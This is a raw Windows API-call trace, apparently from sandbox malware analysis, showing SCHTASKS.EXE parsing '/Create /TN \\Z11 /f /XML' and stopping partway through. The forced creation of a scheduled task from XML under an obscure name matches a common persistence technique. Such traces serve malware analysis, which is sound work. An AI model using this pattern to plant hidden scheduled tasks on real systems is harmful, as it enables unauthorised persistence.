[0219.515] GetProcessHeap () returned 0x2d0000
[0219.515] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5ed0
[0219.515] GetProcessHeap () returned 0x2d0000
[0219.515] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecc60
[0219.516] GetProcessHeap () returned 0x2d0000
[0219.516] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecc90
[0219.516] GetProcessHeap () returned 0x2d0000
[0219.516] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2eccc0
[0219.516] GetProcessHeap () returned 0x2d0000
[0219.516] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebc00
[0219.516] _memicmp (_Buf1=0x2ebc00, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.516] GetProcessHeap () returned 0x2d0000
[0219.516] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xa0) returned 0x2ec180
[0219.516] GetProcessHeap () returned 0x2d0000
[0219.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2eccf0
[0219.517] GetProcessHeap () returned 0x2d0000
[0219.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecd20
[0219.517] GetProcessHeap () returned 0x2d0000
[0219.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecd50
[0219.517] GetProcessHeap () returned 0x2d0000
[0219.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebc20
[0219.517] _memicmp (_Buf1=0x2ebc20, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.517] GetProcessHeap () returned 0x2d0000
[0219.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x200) returned 0x2ed430
[0219.517] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x2ed430, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0219.518] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0219.518] GetProcessHeap () returned 0x2d0000
[0219.518] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x30) returned 0x2e7d40
[0219.518] _vsnwprintf (in: _Buffer=0x2ec180, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x18f1d8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0219.518] GetProcessHeap () returned 0x2d0000
[0219.518] GetProcessHeap () returned 0x2d0000
[0219.518] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec350) returned 1
[0219.519] GetProcessHeap () returned 0x2d0000
[0219.519] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec350) returned 0x74e
[0219.520] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec350 | out: hHeap=0x2d0000) returned 1
[0219.520] SetLastError (dwErrCode=0x0)
[0219.520] GetThreadLocale () returned 0x409
[0219.520] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.521] lstrlenW (lpString="?") returned 1
[0219.521] GetThreadLocale () returned 0x409
[0219.521] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.521] lstrlenW (lpString="create") returned 6
[0219.521] GetThreadLocale () returned 0x409
[0219.521] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.521] lstrlenW (lpString="delete") returned 6
[0219.521] GetThreadLocale () returned 0x409
[0219.521] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.521] lstrlenW (lpString="query") returned 5
[0219.521] GetThreadLocale () returned 0x409
[0219.521] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.521] lstrlenW (lpString="change") returned 6
[0219.522] GetThreadLocale () returned 0x409
[0219.522] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.522] lstrlenW (lpString="run") returned 3
[0219.522] GetThreadLocale () returned 0x409
[0219.522] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.522] lstrlenW (lpString="end") returned 3
[0219.522] GetThreadLocale () returned 0x409
[0219.522] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.522] lstrlenW (lpString="showsid") returned 7
[0219.522] GetThreadLocale () returned 0x409
[0219.522] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.522] SetLastError (dwErrCode=0x0)
[0219.522] SetLastError (dwErrCode=0x0)
[0219.522] lstrlenW (lpString="/Create") returned 7
[0219.522] lstrlenW (lpString="-/") returned 2
[0219.523] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0219.523] lstrlenW (lpString="?") returned 1
[0219.523] lstrlenW (lpString="?") returned 1
[0219.523] GetProcessHeap () returned 0x2d0000
[0219.523] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ec230
[0219.523] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.523] GetProcessHeap () returned 0x2d0000
[0219.523] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xa) returned 0x2ec350
[0219.523] lstrlenW (lpString="Create") returned 6
[0219.523] GetProcessHeap () returned 0x2d0000
[0219.523] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ec370
[0219.523] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.523] GetProcessHeap () returned 0x2d0000
[0219.523] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x14) returned 0x2ec390
[0219.524] _vsnwprintf (in: _Buffer=0x2ec350, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|?|") returned 3
[0219.524] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|Create|") returned 8
[0219.524] lstrlenW (lpString="|?|") returned 3
[0219.524] lstrlenW (lpString="|Create|") returned 8
[0219.524] SetLastError (dwErrCode=0x490)
[0219.524] lstrlenW (lpString="create") returned 6
[0219.524] lstrlenW (lpString="create") returned 6
[0219.524] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.524] GetProcessHeap () returned 0x2d0000
[0219.524] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec350) returned 1
[0219.524] GetProcessHeap () returned 0x2d0000
[0219.524] RtlReAllocateHeap (Heap=0x2d0000, Flags=0xc, Ptr=0x2ec350, Size=0x14) returned 0x2ec3b0
[0219.524] lstrlenW (lpString="Create") returned 6
[0219.525] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.525] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|create|") returned 8
[0219.525] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|Create|") returned 8
[0219.525] lstrlenW (lpString="|create|") returned 8
[0219.525] lstrlenW (lpString="|Create|") returned 8
[0219.525] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0219.567] SetLastError (dwErrCode=0x0)
[0219.574] SetLastError (dwErrCode=0x0)
[0219.616] SetLastError (dwErrCode=0x0)
[0219.652] lstrlenW (lpString="/TN") returned 3
[0219.652] lstrlenW (lpString="-/") returned 2
[0219.652] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0219.652] lstrlenW (lpString="?") returned 1
[0219.652] lstrlenW (lpString="?") returned 1
[0219.652] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.652] lstrlenW (lpString="TN") returned 2
[0219.652] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.652] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|?|") returned 3
[0219.652] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.652] lstrlenW (lpString="|?|") returned 3
[0219.653] lstrlenW (lpString="|TN|") returned 4
[0219.653] SetLastError (dwErrCode=0x490)
[0219.653] lstrlenW (lpString="create") returned 6
[0219.653] lstrlenW (lpString="create") returned 6
[0219.653] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.653] lstrlenW (lpString="TN") returned 2
[0219.653] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.653] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|create|") returned 8
[0219.653] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.653] lstrlenW (lpString="|create|") returned 8
[0219.653] lstrlenW (lpString="|TN|") returned 4
[0219.653] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0219.654] SetLastError (dwErrCode=0x490)
[0219.654] lstrlenW (lpString="delete") returned 6
[0219.654] lstrlenW (lpString="delete") returned 6
[0219.654] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.654] lstrlenW (lpString="TN") returned 2
[0219.654] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.654] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|delete|") returned 8
[0219.654] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.654] lstrlenW (lpString="|delete|") returned 8
[0219.654] lstrlenW (lpString="|TN|") returned 4
[0219.654] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0219.654] SetLastError (dwErrCode=0x490)
[0219.654] lstrlenW (lpString="query") returned 5
[0219.654] lstrlenW (lpString="query") returned 5
[0219.654] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.655] lstrlenW (lpString="TN") returned 2
[0219.655] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.655] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|query|") returned 7
[0219.655] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.655] lstrlenW (lpString="|query|") returned 7
[0219.655] lstrlenW (lpString="|TN|") returned 4
[0219.655] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0
[0219.655] SetLastError (dwErrCode=0x490)
[0219.655] lstrlenW (lpString="change") returned 6
[0219.655] lstrlenW (lpString="change") returned 6
[0219.655] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.655] lstrlenW (lpString="TN") returned 2
[0219.655] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.656] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|change|") returned 8
[0219.656] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.656] lstrlenW (lpString="|change|") returned 8
[0219.656] lstrlenW (lpString="|TN|") returned 4
[0219.656] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0
[0219.656] SetLastError (dwErrCode=0x490)
[0219.656] lstrlenW (lpString="run") returned 3
[0219.656] lstrlenW (lpString="run") returned 3
[0219.656] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.656] lstrlenW (lpString="TN") returned 2
[0219.656] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.656] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|run|") returned 5
[0219.656] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.656] lstrlenW (lpString="|run|") returned 5
[0219.657] lstrlenW (lpString="|TN|") returned 4
[0219.657] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0
[0219.657] SetLastError (dwErrCode=0x490)
[0219.657] lstrlenW (lpString="end") returned 3
[0219.657] lstrlenW (lpString="end") returned 3
[0219.657] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.657] lstrlenW (lpString="TN") returned 2
[0219.657] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.657] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|end|") returned 5
[0219.657] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.657] lstrlenW (lpString="|end|") returned 5
[0219.657] lstrlenW (lpString="|TN|") returned 4
[0219.657] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0
[0219.657] SetLastError (dwErrCode=0x490)
[0219.658] lstrlenW (lpString="showsid") returned 7
[0219.658] lstrlenW (lpString="showsid") returned 7
[0219.658] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.658] GetProcessHeap () returned 0x2d0000
[0219.658] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec3b0) returned 1
[0219.658] GetProcessHeap () returned 0x2d0000
[0219.658] RtlReAllocateHeap (Heap=0x2d0000, Flags=0xc, Ptr=0x2ec3b0, Size=0x16) returned 0x2ec3b0
[0219.658] lstrlenW (lpString="TN") returned 2
[0219.658] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.658] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|showsid|") returned 9
[0219.658] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.658] lstrlenW (lpString="|showsid|") returned 9
[0219.659] lstrlenW (lpString="|TN|") returned 4
[0219.659] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0
[0219.659] SetLastError (dwErrCode=0x490)
[0219.659] SetLastError (dwErrCode=0x490)
[0219.659] SetLastError (dwErrCode=0x0)
[0219.659] lstrlenW (lpString="/TN") returned 3
[0219.659] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0
[0219.659] SetLastError (dwErrCode=0x490)
[0219.659] SetLastError (dwErrCode=0x0)
[0219.659] lstrlenW (lpString="/TN") returned 3
[0219.659] GetProcessHeap () returned 0x2d0000
[0219.659] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x8) returned 0x2ec350
[0219.659] GetProcessHeap () returned 0x2d0000
[0219.659] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecd80
[0219.659] SetLastError (dwErrCode=0x0)
[0219.659] SetLastError (dwErrCode=0x0)
[0219.660] lstrlenW (lpString="\\Z11") returned 4
[0219.660] lstrlenW (lpString="-/") returned 2
[0219.660] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0219.660] SetLastError (dwErrCode=0x490)
[0219.660] SetLastError (dwErrCode=0x490)
[0219.660] SetLastError (dwErrCode=0x0)
[0219.660] lstrlenW (lpString="\\Z11") returned 4
[0219.660] StrChrIW (lpStart="\\Z11", wMatch=0x3a) returned 0x0
[0219.660] SetLastError (dwErrCode=0x490)
[0219.660] SetLastError (dwErrCode=0x0)
[0219.660] lstrlenW (lpString="\\Z11") returned 4
[0219.660] GetProcessHeap () returned 0x2d0000
[0219.660] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xa) returned 0x2ec3e0
[0219.660] GetProcessHeap () returned 0x2d0000
[0219.660] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecdb0
[0219.660] SetLastError (dwErrCode=0x0)
[0219.660] SetLastError (dwErrCode=0x0)
[0219.661] lstrlenW (lpString="/f") returned 2
[0219.661] lstrlenW (lpString="-/") returned 2
[0219.661] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0219.661] lstrlenW (lpString="?") returned 1
[0219.661] lstrlenW (lpString="?") returned 1
[0219.661] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.661] lstrlenW (lpString="f") returned 1
[0219.661] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.661] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|?|") returned 3
[0219.661] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.661] lstrlenW (lpString="|?|") returned 3
[0219.661] lstrlenW (lpString="|f|") returned 3
[0219.662] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0219.662] SetLastError (dwErrCode=0x490)
[0219.662] lstrlenW (lpString="create") returned 6
[0219.662] lstrlenW (lpString="create") returned 6
[0219.662] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.662] lstrlenW (lpString="f") returned 1
[0219.662] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.662] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|create|") returned 8
[0219.662] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.662] lstrlenW (lpString="|create|") returned 8
[0219.662] lstrlenW (lpString="|f|") returned 3
[0219.662] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0219.662] SetLastError (dwErrCode=0x490)
[0219.663] lstrlenW (lpString="delete") returned 6
[0219.663] lstrlenW (lpString="delete") returned 6
[0219.663] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.663] lstrlenW (lpString="f") returned 1
[0219.663] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.663] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|delete|") returned 8
[0219.663] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.663] lstrlenW (lpString="|delete|") returned 8
[0219.663] lstrlenW (lpString="|f|") returned 3
[0219.663] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0219.663] SetLastError (dwErrCode=0x490)
[0219.663] lstrlenW (lpString="query") returned 5
[0219.663] lstrlenW (lpString="query") returned 5
[0219.663] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.664] lstrlenW (lpString="f") returned 1
[0219.664] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.664] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|query|") returned 7
[0219.664] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.664] lstrlenW (lpString="|query|") returned 7
[0219.664] lstrlenW (lpString="|f|") returned 3
[0219.664] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0
[0219.664] SetLastError (dwErrCode=0x490)
[0219.664] lstrlenW (lpString="change") returned 6
[0219.664] lstrlenW (lpString="change") returned 6
[0219.664] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.664] lstrlenW (lpString="f") returned 1
[0219.664] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.665] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|change|") returned 8
[0219.665] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.665] lstrlenW (lpString="|change|") returned 8
[0219.665] lstrlenW (lpString="|f|") returned 3
[0219.665] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0
[0219.665] SetLastError (dwErrCode=0x490)
[0219.665] lstrlenW (lpString="run") returned 3
[0219.665] lstrlenW (lpString="run") returned 3
[0219.665] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.665] lstrlenW (lpString="f") returned 1
[0219.665] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.667] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|run|") returned 5
[0219.667] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.667] lstrlenW (lpString="|run|") returned 5
[0219.806] lstrlenW (lpString="|f|") returned 3
[0220.157] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0
[0220.157] SetLastError (dwErrCode=0x490)
[0220.157] lstrlenW (lpString="end") returned 3
[0220.157] lstrlenW (lpString="end") returned 3
[0220.158] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.158] lstrlenW (lpString="f") returned 1
[0220.158] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.158] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|end|") returned 5
[0220.158] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0220.158] lstrlenW (lpString="|end|") returned 5
[0220.158] lstrlenW (lpString="|f|") returned 3
[0220.158] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0
[0220.158] SetLastError (dwErrCode=0x490)
[0220.158] lstrlenW (lpString="showsid") returned 7
[0220.158] lstrlenW (lpString="showsid") returned 7
[0220.158] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.158] lstrlenW (lpString="f") returned 1
[0220.159] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.159] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|showsid|") returned 9
[0220.159] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0220.159] lstrlenW (lpString="|showsid|") returned 9
[0220.159] lstrlenW (lpString="|f|") returned 3
[0220.159] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0
[0220.159] SetLastError (dwErrCode=0x490)
[0220.159] SetLastError (dwErrCode=0x490)
[0220.159] SetLastError (dwErrCode=0x0)
[0220.159] lstrlenW (lpString="/f") returned 2
[0220.159] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0
[0220.159] SetLastError (dwErrCode=0x490)
[0220.159] SetLastError (dwErrCode=0x0)
[0220.159] lstrlenW (lpString="/f") returned 2
[0220.159] GetProcessHeap () returned 0x2d0000
[0220.159] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x6) returned 0x2ec400
[0220.160] GetProcessHeap () returned 0x2d0000
[0220.160] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecde0
[0220.160] SetLastError (dwErrCode=0x0)
[0220.160] SetLastError (dwErrCode=0x0)
[0220.160] lstrlenW (lpString="/XML") returned 4
[0220.160] lstrlenW (lpString="-/") returned 2
[0220.160] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0220.160] lstrlenW (lpString="?") returned 1
[0220.160] lstrlenW (lpString="?") returned 1
[0220.160] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.160] lstrlenW (lpString="XML") returned 3
[0220.160] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.160] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|?|") returned 3
[0220.160] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.160] lstrlenW (lpString="|?|") returned 3
[0220.160] lstrlenW (lpString="|XML|") returned 5
[0220.161] SetLastError (dwErrCode=0x490)
[0220.161] lstrlenW (lpString="create") returned 6
[0220.161] lstrlenW (lpString="create") returned 6
[0220.161] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.161] lstrlenW (lpString="XML") returned 3
[0220.161] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.161] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|create|") returned 8
[0220.161] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.161] lstrlenW (lpString="|create|") returned 8
[0220.161] lstrlenW (lpString="|XML|") returned 5
[0220.161] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0220.161] SetLastError (dwErrCode=0x490)
[0220.161] lstrlenW (lpString="delete") returned 6
[0220.161] lstrlenW (lpString="delete") returned 6
[0220.161] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.162] lstrlenW (lpString="XML") returned 3
[0220.162] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.162] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|delete|") returned 8
[0220.162] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.162] lstrlenW (lpString="|delete|") returned 8
[0220.162] lstrlenW (lpString="|XML|") returned 5
[0220.162] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0
[0220.162] SetLastError (dwErrCode=0x490)
[0220.162] lstrlenW (lpString="query") returned 5
[0220.162] lstrlenW (lpString="query") returned 5
[0220.162] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.162] lstrlenW (lpString="XML") returned 3
[0220.162] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.162] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|query|") returned 7
